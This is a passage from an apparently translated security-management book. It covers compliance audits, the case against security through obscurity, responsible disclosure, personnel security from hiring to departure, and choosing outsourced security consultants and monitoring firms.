A policy compliance audit is the set of actions carried out to determine whether the standards set out in the policy are being met and, if they are not, why. Standards usually also supply criteria and methods by which they themselves can be measured, and an auditor can use these to measure whether a given standard is being met. If standards are not being met, this can be the result of any combination of the following:
• Personnel shortcomings;
• Inadequate training and lack of the necessary skills;
• Overwork;
• Shortcomings in facilities;
• Lack of the necessary motivation;
• Lack of adequate equipment;
• Insufficient or unsuitable resources;
• Inadequate maintenance and support;
• Overuse or overloading;
• Organizational shortcomings;
• Lack of responsibility;
• Conflicting responsibilities;
• Unclear, inconsistent and confusing division of work;
• Policy shortcomings;
• Unforeseen risks;
• Incomplete or missing policies;
• Conflicting policies; and
• Mismatch between policy and environment.
The key point about the list above is that policy problems cannot be blamed on errors by users or administrators. Even inadequate training or excessive overtime is generally not within administrators' control. A compliance audit should therefore not be seen as an undesirable process; rather, it should be viewed as a collective effort to identify problems, find and reallocate resources, refine policies and standards, and raise awareness of security needs. As in every other area of security, a team approach is the most effective one here in the overwhelming majority of situations. If the matter is managed properly, staff can achieve the desired security. The key is to help them do their jobs, not to put ourselves on the other side of the table, opposite them.
The Problems with Security Through Obscurity
In traditional security mechanisms, which derived largely from military intelligence organizations, there was a concept known as "need to know". Information was compartmentalized, and each person was given only as much of it as was needed to carry out his or her duties. In environments where particular pieces of information are sensitive, or where inferential security must be maintained, this policy makes particular sense. If three pieces of information taken together can lead to a damaging result, but nobody has access to more than two of them, then security can be said to be assured.
In a computer operations environment, applying the "need to know" concept is usually not appropriate. This is especially true when you have based your security on some technical matter being unknown to attackers. Relying on attackers' ignorance can undermine your security.
Consider an environment in which management decides to keep the manuals out of users' reach, so that they cannot learn about commands and options that might be used to compromise the system. In such circumstances managers may believe that they have increased their security, but in fact they have not. A determined attacker can find these documents elsewhere, through other users or other offices. Large quantities of these documents are available no farther away than the bookstore nearest to any office! Management cannot close off every avenue for learning about the system. Meanwhile local users, because they cannot see the documentation and learn about more efficient options, may get very little use out of the machines. Their morale may also suffer, because the implicit message from management in doing this is "We do not fully trust you to be a responsible user". Moreover, in such circumstances, if someone does start abusing the system's commands and features, management may not have sufficient ability to recognize and combat the problem; and if something should happen to the one or two users who were authorized to access the documentation, nobody else will have the experience or knowledge needed to help when problems arise.
Keeping bugs or features secret in order to provide protection against them is likewise a weak approach to security. Software writers commonly place back doors in their programs that let them gain access privileges without supplying a password. Sometimes, too, system bugs with profound security consequences are left in place because the manager assumes that nobody knows about them. The problem with these approaches is that the problems and features present in a program are very likely to be discovered, either by accident or by a determined intruder. Keeping bugs and features hidden means that they are not watched and, naturally, remain unfixed. So once they are discovered, the existence of the problem leaves all similar systems vulnerable to attack by the people who discovered it.
The value of keeping algorithms secret, for example a proprietary encryption algorithm, is also debatable. Unless you are an expert in cryptography, you cannot judge the strength of an algorithm. The result may be a mechanism with serious flaws. An algorithm that is kept secret is naturally not examined by others, and so anyone who finds a flaw in it will be able to gain access to your data without your knowledge.
Similarly, keeping the source code of the operating system or of application programs confidential provides no guarantee of security either. Those who are determined to get into your system will find security holes from time to time, whether or not they have the source code.[87] But without access to the source code, users cannot examine it systematically to find its problems; so although keeping the source code hidden may bring some small advantage, security must not depend on that concealment.
Attitude toward security is the key point. Defensive measures that rest on secrecy all lose their value if that confidentiality is breached. Worse still, maintaining confidentiality prevents or restricts auditing and monitoring of the program, and it may never be possible to tell whether the confidentiality has been breached. Greater security can be achieved with algorithms and mechanisms that are inherently strong, even if the attacker knows about them. The very fact that you use strong mechanisms that everybody knows about may discourage an attacker and lead him to look somewhere other than your systems for the thrill of breaking in. Money hidden in a locked drawer is safer than money whose only protection is that nobody knows you keep it in a mayonnaise jar in the refrigerator!
[87] Unless you have developed every part of a piece of software yourself, on your own workstation, various people may have had access to the source code, and there is a possibility that the source code will be disclosed, accidentally or deliberately.
Responsible Disclosure
The objection raised against "security through obscurity" does not mean that you should publicize security holes widely as soon as you find them. There are major differences between secrecy and prudence. If you discover a security hole in distributed or widely used software, you should quietly, and as quickly as possible, notify the developer of that software. We also recommend that you notify one of the FIRST organizations (described in Appendix 4). These organizations can help developers prepare patches for the discovered security holes and make sure that the patches are distributed and correctly applied.
If you trumpet a software security hole, you create problems for everyone who uses that software and cannot fix its bugs. In the Unix environment, many users have become accustomed to modifying the source of a program to fix its bugs. Unfortunately, not everyone has that ability, and many consumers must wait weeks or months for updated software to be released by the vendor concerned. Some offices may not even be able to upgrade their software, because they do nothing with the computer beyond switching it on and working with the software they need, or because their software has been certified on the basis of its existing settings and they therefore cannot change its configuration. Some systems may be run by people who lack the skills needed to apply patches, and other systems may not be in active use or may lie outside the organization's scope of support. Always act responsibly. It is better to distribute a patch to staff without explaining the underlying vulnerability than to hand attackers details of how to break into unpatched systems.
We have seen many cases in which an expert reported an important security flaw to a very public mailing list. Although this person's aim was to obtain a quick fix from vendors, the result was a wave of attacks against systems whose administrators did not have access to that mailing list's postings or were unable to apply the fix provided.
If no patch yet exists for recent vulnerabilities in your system, posting their details to a mailing list will not only put many other sites at risk; if an intruder uses the flaw to break into other sites, legal action may also be taken against you in connection with the resulting damage.[88] If you are concerned about your own security, bear in mind that you are part of a community. In a community, one should also seek to strengthen the security of others, and remember that one day we too may need others' help.
[88] Although we have not yet seen such a case occur, several lawyers have told us that they expect their clients to ask them to do exactly this.
Summary of the Discussion of Prevention and Policy
The key to successful risk assessment is identifying all possible threats to the system and defending against those attacks that you consider most likely.
The fact that people are the weakest link in security does not mean that protecting other weak points should be forgotten. People are unpredictable, but abusing a modem that has no password is far easier than persuading a key employee to accept a bribe. So wherever possible we should use technology-based defensive mechanisms, and improve our personnel security by training users and staff. In addition, we rely on defense in depth: we employ multiple stages of defense, such as backups, so that if one layer fails to provide the necessary protection we do not suffer fundamental losses. For example, we buy a backup UPS system; or, although there is a strong lock on the building door, we put a separate lock on the door to the computer room. The truth is that an attacker can defeat these combinations too, but we raise the cost of doing so, high enough that we may be able to convince him that getting past our system's barriers is not worth the trouble. At the very least, you can hope to have slowed the attacker down enough that monitoring and alarm systems alert you to the intrusion before important assets are harmed.
With these limitations in mind, you need to approach computer security with priorities that you have thought through carefully in advance, because you cannot provide protection against every possible threat. Sometimes, instead of preventing a problem, you should let it happen and then deal with its effects. For example, in the case of a power failure, circumstances may be such that letting the systems shut down and restart costs you far less than buying a UPS system.
There are other cases against which you may have no particular idea how to defend (such as an alien invasion from space); or which, being highly improbable, are very hard to defend against (such as a nuclear explosion within 200 meters of your data center); or which are far too catastrophic to be countered (such as your manager deciding to convert all the Unix machines to a better-known operating system!). The key to good management is knowing what you are worried about, and how worrying each of these issues is.
Weigh your decisions about what you want to protect, and the costs you may incur to prevent its loss, against the costs of repairing the damage caused by an incident. Then, using this table and a prioritized list of the vast majority of critical needs, make your decisions about security activities and measures. Make sure that this analysis covers equipment and assets other than computers as well; and do not forget that your backup tapes, network connections, terminals and documentation are all parts of the system, and each can cause losses to the system as a whole. The safety of staff, the company's premises, and its reputation and public standing are also very important and must be taken into account in security planning.
Chapter Six
Personnel Security
Overview
This chapter briefly examines those security issues that originate inside the organization. Personnel security issues, from hiring and dismissal through to training and awareness, play a vital role in the organization's preventive and defensive performance.
Risks Arising from Personnel: A Hidden Threat to the Organization
Consider a few of the newsworthy incidents caused by organizations' employees over the past few years:
• Nick Leeson, an investment trader at the Singapore branch of Barings Bank, and Toshihide Iguchi of the New York office of Daiwa Bank both made high-risk investments that led to the loss of substantial amounts of their banks' capital; but instead of admitting failure they tampered with computer account records and, by doing so, in effect put still more money into the gamble to make up for the earlier losses; and they were finally discovered only after inflicting more than a billion dollars in losses on each of the two banks. As a result of these actions Barings Bank was forced to declare bankruptcy, and Daiwa Bank permanently lost its license to do business in the United States.
• In the United States, some organizations and individuals, despite holding valid security clearances from the CIA, the FBI and the military, passed classified information to Russia and Israel (for example Aldrich Ames, Jonathan Pollard, Robert Hanssen and Robert Walker). Despite numerous security controls, these individuals were able to carry out damaging espionage, in some cases for more than a decade.
• John Deutch, director of the CIA during Bill Clinton's presidency, took classified government information from the agency to his home, where he stored it on computers configured for "unclassified" use. While the classified information was on those computers, they were also used to visit obscene and immoral websites, sites that could have used both publicly known, published vulnerabilities and new, undisclosed vulnerabilities to attack visiting systems. Although Deutch had violated numerous regulations and laws in this matter, no practical action was taken against him, and on the last day of Clinton's presidency he was pardoned by him.
If you examine these cases and the other computer violations and offenses of the past few decades, you will see one feature common to them all: every one of them was committed by people. The agents of break-ins were people; computer viruses were written by people; and passwords were stolen by people.
"Personnel security" covers everything to do with employees: hiring, training, monitoring behavior and, sometimes, dismissal. Statistics show that the most significant group of perpetrators of serious computer crime are those who either have legitimate access to the data or had it in the recent past. Some studies show that more than 80% of incidents are caused by such people. Managing employees with classified access is therefore an important part of a good security plan.
People contribute to computer security problems in two ways. Some of them unintentionally help security incidents to occur by not following security procedures, forgetting security considerations, and being unaware of the consequences of what they do. Others knowingly violate controls and procedures in order to assist an incident, or to cause one on their own. As we noted earlier, in most cases the people who knowingly play a part in your security problems are your own employees (or were until recently): people who are familiar with the controls and know what information, of what value, is likely to be found where.
In the course of administering, say, a Unix system, you may encounter people from both groups. The controls and mechanisms related to personnel security are many and varied, and discussing them all would require a whole book; we therefore only summarize the most important of them. Setting policy for personnel cannot prevent security breaches, but it does reduce those security threats to your company that come from your own employees.
Security in the Hiring Process
Background Checks
When you hire new employees, check their backgrounds. You may have asked applicants to fill out application forms, but what then? The least you should do is check all the references that each applicant has given, so that you can learn about his or her past, including the reasons for leaving previous jobs. Do not forget, when checking records, to examine carefully the dates of previous hirings and departures, and also any gaps between them. You also need to verify the validity of every certificate and academic degree; for it has happened many times that people have spoken of their degrees from reputable universities when those universities had no record showing that the person had completed even a single course! Some people may also present degrees from universities that are only a little bigger than a post office! Bear in mind that a person who resorts to lying in order to be hired cannot be used in sensitive positions.
Intensive Investigations
In some cases you may want to carry out more serious investigations into applicants' character and background. Depending on the level of the job the applicant is to fill, and the access he or she is to have to sensitive systems and data, you may want to:
• Use the help of a specialist investigation organization to check people's backgrounds;
• Ask applicants for a certificate of no criminal record;
• Check applicants' credit records to see whether they have had large personal debts that they could not manage. If you find such a case, discuss it with the applicant. People who are in debt should not be denied work, because then they will never be able to repay their debts. At the same time, it should not be overlooked that employees under financial pressure are more likely to behave improperly.
• Consider giving the applicant a polygraph test (if the law permits you to). Although polygraph tests are not always accurate, they can be useful if you have a sensitive position in mind for the applicant.
• Ask the applicant to provide a bond for working in the position concerned.
In general, carrying out all of these steps is not recommended for hiring every employee, but for employees who will work in positions that require a high level of trust and whose holders will have special access, such as hiring or dismissing staff, you should carry out additional checks. We suggest that you tell the applicant that you intend to carry out such checks, and obtain his or her consent. Although doing so is not essential, it makes the checks easier to carry out and lets the applicant know that you are careful and serious about hiring. Sometimes you need the applicant's explicit permission to carry out these investigations.
Periodic Rechecks
Once you have carried out your tests and hired the applicant, you should repeat some of the checks periodically. You should then compare the results of the current and previous checks to identify any changes. Some changes may call for deeper investigation. For example, if you have an employee who is responsible for your accounting system, including preparing computer-generated checks for creditors, you may need to check the funds in his or her bank accounts at short intervals as well. If your rechecking is done every two years and you find that an employee's behavior falls outside the set criteria, you will naturally decide to investigate further.
Initial Training
Your security concerns about an employee should not stop once he or she has been hired. Every computer user must receive basic training in security policies. At a minimum, this training should cover proper procedures for choosing and using passwords, physical access to computers and networks (who is authorized to connect to equipment, and how), procedures for making and keeping backups, policies for connecting to the company's computers remotely (by telephone), and policies on disclosing information over the telephone. Executives should not be exempted from this because of their position; they are at least as likely as other staff, if not more so, to choose weak passwords and make other mistakes. They too must demonstrate their commitment to security, because security awareness in organizations flows from the top down, not the other way round.
Training should include written documents and a copy of the computer use policies, and should cover topics such as proper and improper use of computers and networks, personal use of computing equipment (during and after working hours), policies on the ownership and use of electronic mail, and policies on bringing software and data in and taking them out. The penalties for violating the rules should also be explained during training.
All users should sign forms stating that they are aware of this information and accept its restrictions. These forms should be kept for years so that, if the question later arises of whether the employee was given prior notice of what the organization is entitled to do with regard to him or her, documentary proof can be produced.
Ongoing Training and Awareness
Users need to receive fresh information about security and proper computer use at regular intervals. This retraining gives users a good opportunity to be reminded of existing threats and their consequences, and creates a forum for exchanging views and sharing concerns.
You need to give employees adequate opportunity for current and future training, for example by encouraging attendance at professional conferences and seminars, subscriptions to professional and trade periodicals, and access to reference books and other training materials. Employees must be given enough time to make use of the books, and the incentives needed to learn the required skills.
Alongside periodic training, you may want to use more varied methods to keep this process going, for example putting up posters or notices about best practices, announcing daily and weekly slogans, designating a day as "Security Day", or holding various meetings and seminars, so that the importance of security does not fade from general view.
Of course, the size and nature of the organization, the level of threats and potential losses, and finally the number and behavior of the staff are all factors that must be taken into account when drawing up plans. The costs of awareness activities should also be planned for in advance and included in the organization's budget.
Performance Review and Monitoring
Your employees' performance should be reviewed periodically. In particular, employees should receive credit and rewards for professional growth and successful performance. At the same time, problems should be identified and resolved constructively. You should encourage your employees to increase their abilities and deepen their understanding.
You should also prevent situations from arising in which staff develop destructive feelings such as burnout from overwork, being disrespected, or being ignored. Such an atmosphere in the office may lead staff to neglect the organization's interests. Staff may also leave your organization for better job opportunities; or, worse still, they may take part in disruptive activities against you out of revenge. Overtime should be an exception, not the rule, and all employees, especially those in sensitive positions, must be given adequate holidays and time off. Overtime severely tires employees, and fatigue raises their error rate, causes them to miss or overlook problems, and harms them emotionally. Their private lives will then come under stress as well, because their families and loved ones also want to see them occasionally during the day. Employees who are under excessive pressure and tired are more likely to become disgruntled, and this obviously does nothing to improve security.
In general, signs of severe psychological stress, personal problems and other kinds of difficulty among staff who hold relatively high access privileges should be monitored. Recognizing these problems and, where possible, helping to resolve them is the least that humanity requires. Doing so is also a way of protecting the organization's valuable resources: the staff themselves, and the resources to which they have access.
Auditing Access
Make sure that access to equipment and information can be audited. In addition, make sure that everyone who has any kind of access knows that these audits exist. Many cases of computer misuse occur because the intruder feels that nobody will notice what he is doing. If an offender knows that his activities are being logged, he may refrain from his harmful actions. Auditing does not mean only auditing computer logs; records of people entering and leaving the building, records of people's use of electronic locks, and closed-circuit television tapes can all be audited so as to lay the groundwork for greater accountability.
All the same, you must also watch out for the effects of covert controls. People resent not being trusted and being watched in secret; and if they find out that they are under surveillance they may become angry and even react in extreme ways. For example, in some jurisdictions labor law and employment contracts have been seen to expose employers to heavy civil proceedings.
If monitoring is very close, merely informing employees that they are being watched is not enough. Some studies have shown that employees who are under intense monitoring are less productive and behave worse. This certainly holds if, for example, you want to monitor the length of employees' phone calls, every website they visit, or how often they take breaks. The best policies are those that are drawn up with the agreement and participation of employees, with human resources staff (if you have such a department) present when they are drawn up.
Least Privilege and Separation of Duties
Pay careful attention to the principles of least privilege and separation of duties. These principles have proved their worth over time and should be applied wherever they are practicable in your operations.
Least Privilege
This principle says: give each person the least access needed to do his or her work. This restricted access covers both logical access (access to user accounts, networks and programs) and physical access (access to computers, backup tapes and other peripheral equipment). If every user has an account on every system and physical access to all resources, then all users will pose roughly the same level of threat.
Separation of Duties
This principle rests on carefully separating people's duties from one another, so that those who are responsible for monitoring misuse cannot themselves misuse the systems. Assigning all security activities and audit responsibilities to a single person is therefore dangerous. It can lead to that person flouting the security policies and doing prohibited things, while nobody but that person reads the audit reports on those actions; the violation therefore stays hidden and is very likely to be repeated over time.
Limit Dependence on Key Employees
Nobody in an organization should be irreplaceable, because no human being is immortal or permanent. If an organization's survival depends on the daily performance of one key employee, that organization is undoubtedly at risk. To maintain security, organizations should have written policies and plans for situations such as the illness or sudden dismissal of key people, and should actually use those plans in practice.
In one case reported to us, a company with about 100 employees spent more than 10 years developing its own custom accounting and order-entry system. The system was written in a programming language that was not easy to read, and the company that had produced it went out of business shortly afterwards. Only two people in the company knew how the system worked: the manager of management information systems (MIS) and his programmer. These two were responsible for making changes to the accounting system's programs, preparing annual reports, repairing broken computer equipment, and even making the backups (which were stored outside the company's office premises, in the MIS manager's office).
What would have happened if the MIS manager and his programmer had one day been in a fatal accident on the road? What would have happened if the MIS manager had been offered a better job at several times the salary? And what if the programmer, unable to gain promotion because the company needed to keep him in his post, had become disillusioned and angry about working there?
Key personnel becoming irreplaceable is one of the serious drawbacks and costs of computer systems, and one to which an organization's senior management rarely pays enough attention. It also highlights another reason for using off-the-shelf software and for having written policies and procedures, so that a newcomer can readily take the place of the previous person.
Absence and Departure
Sometimes people leave a job of their own free will (for example for a better job offer) and sometimes involuntarily (for example through death or physical injury). Over shorter periods, too, people go on trips, or may be absent from the office for a few days for family or personal reasons. For each of these cases a set of actions and procedures should be defined for keeping work flowing during an absence or after a departure. This set may include steps such as suspending accounts (though not in the case of an absence), assigning the person's work to other staff, changing sensitive passwords, checking voice mailboxes, or cutting off access to all of these systems.
In some environments these steps can have far-reaching effects. At a university, for example, graduates may be allowed to keep using their accounts for months or years after graduation (for example, to stay in touch with professors). In offices, likewise, if an employee is travelling or off sick (for a few days, that is), the employee's accounts should not be blocked and the passwords should not be changed.

In many cases departure is very sudden and unexpected. In that situation someone may turn up at the departed employee's workplace to make sure the locks are changed, and a security guard escorts the employee out with a box containing the personal belongings that were in the desk drawers. The user account has already been deleted, all system passwords have been changed, and the office phones are no longer connected. This form of separation management is very common in the financial services industry and is regarded as part of the organization's work. The staff concerned are usually employees who were hired at will, under contracts stating that they may be made responsible for carrying out such measures. Whatever the circumstances, use your common sense. You must define precisely what the access policy should be and state it clearly to employees and to those responsible for implementing it.

Security considerations regarding other personnel

Other people who have access to your system may not always have your interests and concerns in mind, or may be careless about the damage that could be done to you. There are many reports of this happening in family settings: children's playmates who have introduced viruses into computer systems, and married people who have searched disks to gather evidence and find out about a spouse's infidelity. In business settings, too, there are reports of cleaners and temporary office staff caught sabotaging or spying on company computers.

You cannot choose your parents, but you can influence who has the right to access your company's computers. Visitors, maintenance staff, contractors, vendors and others may all have temporary or semi-permanent access to your office and your systems. Consider how everything we have discussed so far applies to these people. Finally, remember that no one from outside the office should have unrestricted physical access to your computer and network equipment.

The people whose work history should be reviewed from time to time include:
• System operators and administrators;
• Temporary employees and contractors who have access to the system;
• Maintenance and cleaning staff;
• Security guards;
• Couriers and supply staff who have routine or unsupervised access to the systems;
• Consultants;
• Auditors, inspectors and other finance staff.

All staff who have access to the system should receive the necessary training on security and loss prevention, and the training material should be repeated for them periodically. Staff should also be kept informed of incident response procedures and of the penalties for violating security rules.

Do not forget the threats that come from your own family. Whether you use a shared system at home for the whole family or occasionally bring your children to visit the office, it is important that they know the computer you work with is not a toy. They must learn not to touch sensitive business devices and equipment. Password-protected screen savers are a suitable precaution here. In addition, teach the members of your family that there is no need to talk to anyone about your workplace and your computer-based business.
Chapter Seven
Outsourcing Security

Overview

Using outside resources is a good option for managers of public, private and non-profit enterprises who are concerned about their organization's ability to respond to security threats, but the firm chosen to do the work must be selected carefully and its performance must be checked regularly. This chapter sets out some of the advantages and disadvantages of outsourcing security, together with a set of questions that should be answered before negotiations with new security partners are finalized.

Outsourcing: an alternative to the organization's unwanted entry into new areas

After reading all the material in the previous chapters you may have concluded that all your policies and plans are in good shape; or that there are still things you want to do; or you may be daunted by the sheer volume of work. If you are in the last group, do not assume that the task is impossible for your company. There are other ways of drawing up policies and plans and providing security at your site: using resources, consultants and contractors from outside the company. Even if you run a small one-person business from home, or a small company that depends on information and communication technology, you can benefit from shared expertise by contracting with security firms that are able to employ a trained and experienced team not tied to any single office, share its capabilities among the clients who ask for it, and put its skills at their disposal.

On the other hand, if you have strong skills in information technology you can set up a company and offer your abilities to those who need these services. There are significant career prospects in such companies, because there are not enough information security specialists in the world to meet all the needs of industry and government worldwide. [101] As a result, in response to information security needs in the West there has been an explosion in the use of consultants and outside resources to help organizations of all sizes. As with many other services that can be outsourced, some of these firms are first-rate, some are highly specialized in their own field, and others perform poorly. Unfortunately, the state of this field is such that the weakness of proposals prepared by novices cannot be spotted at a glance.

[101] One consequence of the shortage of trained security specialists is a shortage of staff and resources to support information security education in training centers and universities. Governments and industry claim that this field is of great importance, but they have failed badly at allocating resources to help build it.

If you have not yet been able to draw up your disaster recovery and incident response policies and plans because your organization has no department dedicated to preparing security programs, our advice is to get help from outside the organization. There are several international organizations that assist developing countries in areas related to information technology. Where such expertise is available, it can be very valuable both for short-term support and for building longer-term capability (training and awareness).

Formulating an action plan

The first step is to work out which services you should use:
Are you setting up security as part of your own organization, with your own staff?
If so, you may need only consultants who review your operations to make sure that nothing important has been overlooked.

You may have your own experts for the job but be worried about their limited time or their ability to respond properly to a crisis. In that case you can go to the market for a firm that will send a few contractors to work at your site (full time or part time). You may also want to use a remote monitoring and response firm that simply monitors your security and helps you when a problem arises.

You may be unable to employ a full-time member of staff, or have no need for one. In that case a contract with a consulting and monitoring firm that offers a full service may meet your needs and also be more cost-effective.

The key in each of these cases is to know what your needs are and which of them each service addresses. This is not always simple, because you do not know your real needs until you have gained some experience of security issues and come to know your environment well.

Choosing a vendor

Your success in outsourcing security to third-party firms depends heavily on the organizations or individuals you choose for the job.

Get a referral and insist on references

Because consulting firms vary so widely, one of the best ways to choose one is to ask an organization you know that is similar to your own. Unfortunately, a good referral cannot always be found. Many organizations either found their consulting firm at a trade show, or first read about it in news articles, or decided to use its services after a simple phone call and through an intermediary.

Clearly, a third-party security firm is in a position to do serious damage to your organization. Even if an outside security provider is entirely trustworthy and competent, if you rely on it for a task and the task is done badly, you may not notice the problem until months later when the consequences surface, by which time your relationship with the firm may have ended.

For this reason, when you are considering a firm you should:

Check references
Look for professional references who have used a person or organization providing services similar to the ones you are looking for.

Check people
If particular individuals have been proposed to do your work, evaluate them using the methods described later in this discussion under "People". Be cautious with large consulting firms that will not tell you the names of the people involved in your project until the first installment of the contract fee has been paid.

Consider the firm's stability and continuity
If you have signed a contract for a long-term project, you need to be sure that the contracting firm will exist for the full term of the contract. This does not mean you should refuse to use newly founded firms, but you should make sure the organization has the management and financial backing to meet its commitments. Avoid consulting firms with low rates: if they cannot cover their costs from the services you buy from them, they will try to get the money elsewhere, and so their services, however high in quality, will be focused elsewhere and perhaps even on another line of business.
Beware of scams
Be wary of all-in-one contracts in which a single firm draws up all the policies and also sells the services and hardware needed to implement them. We have received reports in which the security policy requirements and security plan requirements were suspiciously similar for every client, and all of them used much the same base hardware and consulting solutions. If you choose a firm that does not tie you into a long-term exclusive relationship with itself, the policies it draws up are more likely to match your real needs rather than the products it sells.

Consider breadth of experience
As far as possible, be cautious about choosing firms whose experience is mostly with one type of customer or one particular software platform, unless your organization's needs match exactly those of the organizations the firm serves. For example, a consulting firm that mainly provides third-party security services to police departments running Microsoft Windows may not be a suitable choice for a pharmaceutical company that uses a mix of Windows and Unix. The firm's range of experience may not be broad enough to provide policy services that suit your working environment. This does not mean that people with a background in one particular area cannot give you a useful perspective; but you should be careful and look for clear evidence that they can.

The staff of these firms should at least be familiar with the following:
• Labor law and those management issues that anticipate situations in which insiders take legal action against their employer;
• National and local computer crime laws;
• Encryption products, technologies and limitations;
• Viruses, computer worms and other malicious software, as well as scanning software;
• TCP/IP fundamentals in virtual private networks (VPNs) and firewalls;
• General training and awareness, guides and services;
• Incident response and forensic investigation;
• Hardware and software security; and
• Best practices, formal risk assessment methods, and insurance issues.

Any consulting firm that wants to prepare good policies for its client organizations must have staff who are willing to discuss the various topics covered in this book, and in this chapter in particular. If they are not prepared or not able to discuss these topics, they may not be a suitable choice.

If you have particular concerns about such a firm, simply ask it to show you policies or procedures it has prepared for another client. Some firms will give you such a document after removing the client's name and identifying details. Others may have clients who have themselves agreed to be listed as "reference clients". Some may ask you to sign a confidentiality agreement before providing any information. Do not use firms that hand you and others the names and documents of their clients without those clients' permission, because they will naturally hand your information to their next clients without permission too. Finally, if you bring in experts from outside your organization or from another country, remember that one condition of the contract should be that they help develop local capacity in your organization and, where possible, in your country.

It is entirely natural for companies in developing countries to use the help of foreign experts during periods of transition. Ideally, you can use these relationships to transfer knowledge and technology, build up local talent and, where possible, raise the awareness of national experts.
Competency criteria for IT security staff

Above all, you should think about the people who will provide you with security policy-making and implementation services. Unlike other consulting services, you need to be very careful with consultants hired for security matters, because bringing in outsiders to provide security usually means giving them some level of access to your systems and information.

As noted earlier, there are not many skilled experts around. This means that you will sometimes have to use people whose knowledge is not as comprehensive as you would like but who can nevertheless do the job. Be wary of those who make false claims about their expertise, or whose expertise is unrelated to what you need. It is better to use an individual or firm that admits it "will be learning on the job" (and probably charges less for that reason) than to hire someone who tries to hide the gaps in their work.

Today's security market in developed countries is saturated with people who have some level of expertise in securing Windows platforms, but experts in other platforms, including Unix, are scarcer. A great deal about security can be learned from books, but reading books alone is not enough. In the areas that concern you, look for measures of staff competence, in particular:

Certifications
Ask applicants for their certifications, and make sure the certifications they present are valid. Some certifications can effectively be bought: to obtain them a person need only attend a series of online seminars or training classes, memorize theory for a few hours, and answer multiple-choice questions. Such certifications are not worth much. Others require practical experience and deeper expertise.

Certification is still an evolving subject, so we are reluctant to name current examples; but one example is the CISSP [106] certification which, although not everything we might want, is a credible credential attesting to a certain level of experience and expertise in security. [107]

[106] See the CISSP web portal at: http://www.cissps.com/
[107] See also the following certifications at www.isaca.org: CISA (Certified Information Security Auditor), CISM (Certified Information Security Manager)

Education
Check educational background. Some people have acquired strong computer skills through self-study and personal experience, while others hold academic degrees in computer science and engineering; but the generally held view is that skill level matters more than degrees. As we noted in the section on personnel, check whether applicants' claims match their credentials. The US National Security Agency has designated a limited number of educational institutions as centers of educational excellence in information security. According to that list, as of June 2002 leading infosec programs were offered at George Mason University, James Madison University, Idaho State, Iowa State, the Naval Postgraduate School, Purdue University, the University of California at Davis, and the University of Idaho. There are many introductory centers for information technology around the world. Check your local resources, including universities, to find similar centers that may be based there. You can also choose one of the organizations listed in the appendices of this book.

Reputation
Having written a widely used piece of software or authored a book on a security topic such as viruses or cryptography does not mean that someone knows security thoroughly. Some authors have extensive experience across a wide range of security issues, but others are simply good writers or good programmers. Be aware that being well known does not necessarily mean being qualified to consult.

Insurance and bonding
Ask the people you want working for you whether they are insured and bonded. Being insured and bonded shows that their company cares about the competence and conduct of its people. It does not guarantee that the organization has the necessary competence, but it gives some assurance that its staff have no criminal record.

Affiliations
Ask people which local, national and international organizations (ACM, ASIS, CSI, IEEE and USENIX) they belong to and whether they are in good standing with them. These organizations provide their members with educational material and opportunities for professional development, and many of them also publish standards of professional conduct. If your candidate claims only a history of membership in groups such as "The 133t Hax0r Guild", you may do better to look elsewhere for a security expert!

Reformed hackers
We recommend that you avoid working with individuals and organizations that claim to employ reformed hackers as security consultants. [114] Although people who have been involved in computer crime can sometimes become useful members of society, you should not be quick to trust those who have committed crimes or have a bad record. The following points are worth noting:

1. People whose past includes violating the law, private property and individuals' rights to privacy do not seem a good choice for protecting customers' assets and privacy and safeguarding vital resources. Would you use a convicted criminal to design your organization's monitoring and alarm system? Would you put a reformed criminal in charge of the company's special care center? These are not just unpleasant scenarios; if something goes wrong, any of them could land you in court in civil proceedings. After all, it was you who decided to hire them despite knowing their record.

2. Likewise, be careful with people who refuse to give their real name when you interview them. They may really be expert at getting into an organization with a phone call! But one of the most basic reasons people use pseudonyms is that they do not want to be held responsible for what they do. If a pseudonym gets a bad reputation, it is far easier to replace than for someone to change their legal name or repair its record.

3. Finally, many of today's hackers are not particularly knowledgeable about security. In both method and manner of working they behave more like common criminals than like programmers and computer architects. It is the poor quality of today's operating systems, the absence of security in planning, and the wide availability of automated intrusion tools that make intruding on and attacking computer systems so easy. Just as someone with a history of car jumping is not necessarily a skilled racing driver or an expert engine designer, someone who knows how to use intrusion tools and launch denial-of-service attacks may also be fundamentally lacking in the understanding of security needed to keep systems safe.

[114] Statistics on US companies that had employed reformed hackers appear in the 2003 CSI/FBI "Computer Crime and Security Survey": http://i.cmpnet.com/gocsi/db_area/pdfs/fbi/FBI2003.pdf
Monitoring services

If the overall situation is stable, using monitoring services is a good investment. The services commonly offered on a day-to-day basis are on-site administration by contractors, on-site and off-site security monitoring, incident response and forensic investigation (on request), and maintaining a fallback site for use when the main site fails. But in addition to being concerned about the people who provide consulting services, you also need to be careful about the hardware and software they use.

Many monitoring and incident response firms have hardware and software that they want to install on your network. They use it to collect the information needed to review and change the system's security settings. You need to treat this technology with caution, because it sits in a privileged position inside your security perimeter:

1. Make sure you receive complete, written descriptions of how the various network components and devices work. Also make sure you understand how those components work and what each one does.

2. Regarding equipment failures, obtain a written statement from whoever is responsible for the component concerned. If hardware or software installed on your system sends your data outside the organization, or unexpectedly brings your systems down at the busiest time of day, you should not suddenly discover that under your agreement with the vendor it bears no responsibility!

3. Satisfy yourself that careful attention has gone into developing, testing and deploying the technology being added to your systems, especially if it has a one-of-a-kind design. In particular, given the quality record and security problems of Microsoft software, we suggest taking due care before using the services of any firm that has decided to base its security technology on Microsoft products, because that company must constantly fix newly discovered flaws in most of its current products while also maintaining those products' compatibility with earlier versions.

4. Examine carefully whether the firm's technology actually helps prevent problems, or only detects them after they have occurred.

Final words on outsourcing

Using outside experts is a good way to obtain the protection you need. The skills required to draw up policies, monitor intrusion detection systems and firewalls, and prepare and run a disaster recovery program are in some cases highly specialized and uncommon, and may not exist among the organization's current staff. Doing these things right can make the difference between a business continuing and a business ending because of assorted failures and flaws. At the same time, the security consulting field carries risk, because it is new and not well understood. There will always be charlatans, frauds, and the inexperienced and the novice, and in many cases they cannot be told apart from the trustworthy professionals working in the field. Time will help sort things out, but choosing correctly at the outset takes some effort and investment.

One suggested way to benefit from the growth of this field is to avoid signing long-term contracts, unless your security service provider is highly trusted and keeps itself up to date. The security consulting landscape is likely to change a great deal over the next few years, and your interests will be better served if you are free at any time to choose among the options that those changes bring.

Finally, even though you have contracted for a service that monitors your systems for misuse, do not let your own vigilance slip: stay as watchful as you can and strengthen your systems. As threats become more sophisticated, defenders and potential victims must advance and improve as well.
Chapter Eight
